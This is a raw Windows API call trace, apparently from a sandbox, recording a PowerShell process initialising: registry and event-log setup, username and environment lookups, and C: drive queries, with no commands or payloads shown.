	[0603.128] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x38c) returned 0x0
	[0603.128] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x0) returned 0x2
	[0603.128] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x390) returned 0x0
	[0603.128] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd368 | out: phkResult=0xcd368*=0x394) returned 0x0
	[0603.128] RegCloseKey (hKey=0x394) returned 0x0
	[0603.128] RegCloseKey (hKey=0x370) returned 0x0
	[0603.129] RegCloseKey (hKey=0x390) returned 0x0
	[0603.130] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2d8 | out: phkResult=0xcd2d8*=0x390) returned 0x0
	[0603.130] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd24c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd248, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd24c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd248*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.130] CoTaskMemFree (pv=0x0) 
	[0603.130] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0604.222] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x1b981ff0, lpcchName=0xcd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0604.222] CoTaskMemFree (pv=0x1b981ff0) 
	[0604.222] CoTaskMemFree (pv=0x0) 
	[0604.222] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0604.223] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x1b981ff0, lpcchName=0xcd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0604.223] CoTaskMemFree (pv=0x1b981ff0) 
	[0604.223] CoTaskMemFree (pv=0x0) 
	[0604.223] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0604.223] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x1b981ff0, lpcchName=0xcd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0604.223] CoTaskMemFree (pv=0x1b981ff0) 
	[0604.223] CoTaskMemFree (pv=0x0) 
	[0604.223] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0604.223] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x1b981ff0, lpcchName=0xcd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0604.223] CoTaskMemFree (pv=0x1b981ff0) 
	[0604.223] CoTaskMemFree (pv=0x0) 
	[0604.223] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0604.223] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x1b981ff0, lpcchName=0xcd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0604.223] CoTaskMemFree (pv=0x1b981ff0) 
	[0604.223] CoTaskMemFree (pv=0x0) 
	[0604.224] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0604.224] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x1b981ff0, lpcchName=0xcd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0604.224] CoTaskMemFree (pv=0x1b981ff0) 
	[0604.224] CoTaskMemFree (pv=0x0) 
	[0604.224] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0604.224] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x1b981ff0, lpcchName=0xcd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0604.224] CoTaskMemFree (pv=0x1b981ff0) 
	[0604.224] CoTaskMemFree (pv=0x0) 
	[0604.224] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0604.224] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x1b981ff0, lpcchName=0xcd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0604.224] CoTaskMemFree (pv=0x1b981ff0) 
	[0604.224] CoTaskMemFree (pv=0x0) 
	[0604.224] CoTaskMemAlloc (cb=0x204) returned 0x1b981ff0
	[0604.224] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x1b981ff0, lpcchName=0xcd2d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd2d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0604.224] CoTaskMemFree (pv=0x1b981ff0) 
	[0604.224] CoTaskMemFree (pv=0x0) 
	[0604.225] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x370) returned 0x0
	[0604.225] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x0) returned 0x2
	[0604.225] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x394) returned 0x0
	[0604.225] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x0) returned 0x2
	[0604.225] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x398) returned 0x0
	[0604.225] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x0) returned 0x2
	[0604.225] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x39c) returned 0x0
	[0604.225] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x0) returned 0x2
	[0604.225] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x3a0) returned 0x0
	[0604.226] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x0) returned 0x2
	[0604.226] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x3a4) returned 0x0
	[0604.226] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x0) returned 0x2
	[0604.226] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x3a8) returned 0x0
	[0604.226] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x0) returned 0x2
	[0604.226] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x3ac) returned 0x0
	[0604.226] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x0) returned 0x2
	[0604.226] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x3b0) returned 0x0
	[0604.227] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd338 | out: phkResult=0xcd338*=0x3b4) returned 0x0
	[0604.227] RegCloseKey (hKey=0x3b4) returned 0x0
	[0604.227] RegCloseKey (hKey=0x390) returned 0x0
	[0604.227] RegCloseKey (hKey=0x3b0) returned 0x0
	[0604.232] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba50008
	[0604.274] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35de810*="WSMan", lpRawData=0x35de580) returned 1
	[0604.281] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0604.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.281] CoTaskMemFree (pv=0x2913d0) 
	[0604.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.283] CoTaskMemAlloc (cb=0x804) returned 0x1b9843e0
	[0604.283] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9843e0, nSize=0xcd5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd5c8) returned 0x1
	[0604.284] CoTaskMemFree (pv=0x1b9843e0) 
	[0604.284] CoTaskMemAlloc (cb=0x204) returned 0x2f3620
	[0604.284] GetUserNameW (in: lpBuffer=0x2f3620, pcbBuffer=0xcd608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd608) returned 1
	[0604.284] CoTaskMemFree (pv=0x2f3620) 
	[0604.285] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35e3d48*="Alias", lpRawData=0x35e3ad8) returned 1
	[0604.291] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0604.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.291] CoTaskMemFree (pv=0x2913d0) 
	[0604.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.293] CoTaskMemAlloc (cb=0x804) returned 0x1b9843e0
	[0604.293] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9843e0, nSize=0xcd5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd5c8) returned 0x1
	[0604.294] CoTaskMemFree (pv=0x1b9843e0) 
	[0604.294] CoTaskMemAlloc (cb=0x204) returned 0x2f3620
	[0604.294] GetUserNameW (in: lpBuffer=0x2f3620, pcbBuffer=0xcd608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd608) returned 1
	[0604.294] CoTaskMemFree (pv=0x2f3620) 
	[0604.295] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35e9340*="Environment", lpRawData=0x35e90d0) returned 1
	[0604.307] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0604.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.307] CoTaskMemFree (pv=0x2913d0) 
	[0604.308] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0604.308] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0604.308] CoTaskMemFree (pv=0x2913d0) 
	[0604.308] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0604.308] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0604.308] CoTaskMemFree (pv=0x2913d0) 
	[0604.309] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xcd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0604.309] SetErrorMode (uMode=0x1) returned 0x1
	[0604.309] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xcd380 | out: lpFileInformation=0xcd380*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.309] SetErrorMode (uMode=0x1) returned 0x1
	[0604.310] GetLogicalDrives () returned 0x4
	[0604.311] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.312] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0604.312] SetErrorMode (uMode=0x1) returned 0x1
	[0604.313] CoTaskMemAlloc (cb=0x68) returned 0x346050
	[0604.313] CoTaskMemAlloc (cb=0x68) returned 0x345fe0
	[0604.313] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x346050, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xcd350, lpMaximumComponentLength=0xcd34c, lpFileSystemFlags=0xcd348, lpFileSystemNameBuffer=0x345fe0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xcd350*=0x9c354b42, lpMaximumComponentLength=0xcd34c*=0xff, lpFileSystemFlags=0xcd348*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0604.313] CoTaskMemFree (pv=0x346050) 
	[0604.314] CoTaskMemFree (pv=0x345fe0) 
	[0604.314] SetErrorMode (uMode=0x1) returned 0x1
	[0604.314] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0604.315] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.315] SetErrorMode (uMode=0x1) returned 0x1
	[0604.315] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd2f0 | out: lpFileInformation=0xcd2f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.315] SetErrorMode (uMode=0x1) returned 0x1
	[0604.315] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.315] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.315] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0604.316] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0604.317] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.317] SetErrorMode (uMode=0x1) returned 0x1
	[0604.317] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.318] SetErrorMode (uMode=0x1) returned 0x1
	[0604.318] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.318] SetErrorMode (uMode=0x1) returned 0x1
	[0604.318] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd120 | out: lpFileInformation=0xcd120*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.318] SetErrorMode (uMode=0x1) returned 0x1
	[0604.318] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0604.318] SetErrorMode (uMode=0x1) returned 0x1
	[0604.318] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd1c0 | out: lpFileInformation=0xcd1c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0604.318] SetErrorMode (uMode=0x1) returned 0x1
	[0604.319] CoTaskMemAlloc (cb=0x804) returned 0x1b9843e0
	[0604.319] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9843e0, nSize=0xcd5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd5c8) returned 0x1
	[0604.319] CoTaskMemFree (pv=0x1b9843e0) 
	[0604.319] CoTaskMemAlloc (cb=0x204) returned 0x2f3620
	[0604.319] GetUserNameW (in: lpBuffer=0x2f3620, pcbBuffer=0xcd608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd608) returned 1
	[0604.320] CoTaskMemFree (pv=0x2f3620) 
	[0604.320] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35f0430*="FileSystem", lpRawData=0x35f01c0) returned 1
	[0604.324] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0604.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.325] CoTaskMemFree (pv=0x2913d0) 
	[0604.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0604.327] CoTaskMemAlloc (cb=0x804) returned 0x1b9843e0
	[0604.327] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9843e0, nSize=0xcd5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd5c8) returned 0x1
	[0604.327] CoTaskMemFree (pv=0x1b9843e0) 
	[0604.327] CoTaskMemAlloc (cb=0x204) returned 0x2f3620
	[0604.327] GetUserNameW (in: lpBuffer=0x2f3620, pcbBuffer=0xcd608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd608) returned 1
	[0604.327] CoTaskMemFree (pv=0x2f3620) 
	[0604.328] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35f5c70*="Function", lpRawData=0x35f5a00) returned 1
	[0604.348] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0604.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0604.348] CoTaskMemFree (pv=0x2913d0) 
	[0604.386] CoTaskMemAlloc (cb=0x804) returned 0x1b9843e0
	[0604.386] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9843e0, nSize=0xcd5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd5c8) returned 0x1
	[0605.422] CoTaskMemFree (pv=0x1b9843e0) 
	[0605.422] CoTaskMemAlloc (cb=0x204) returned 0x2f3620
	[0605.422] GetUserNameW (in: lpBuffer=0x2f3620, pcbBuffer=0xcd608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd608) returned 1
	[0605.422] CoTaskMemFree (pv=0x2f3620) 
	[0605.422] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3618498*="Registry", lpRawData=0x3618228) returned 1
	[0606.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0606.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0606.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0606.425] CoTaskMemAlloc (cb=0x804) returned 0x1b9843e0
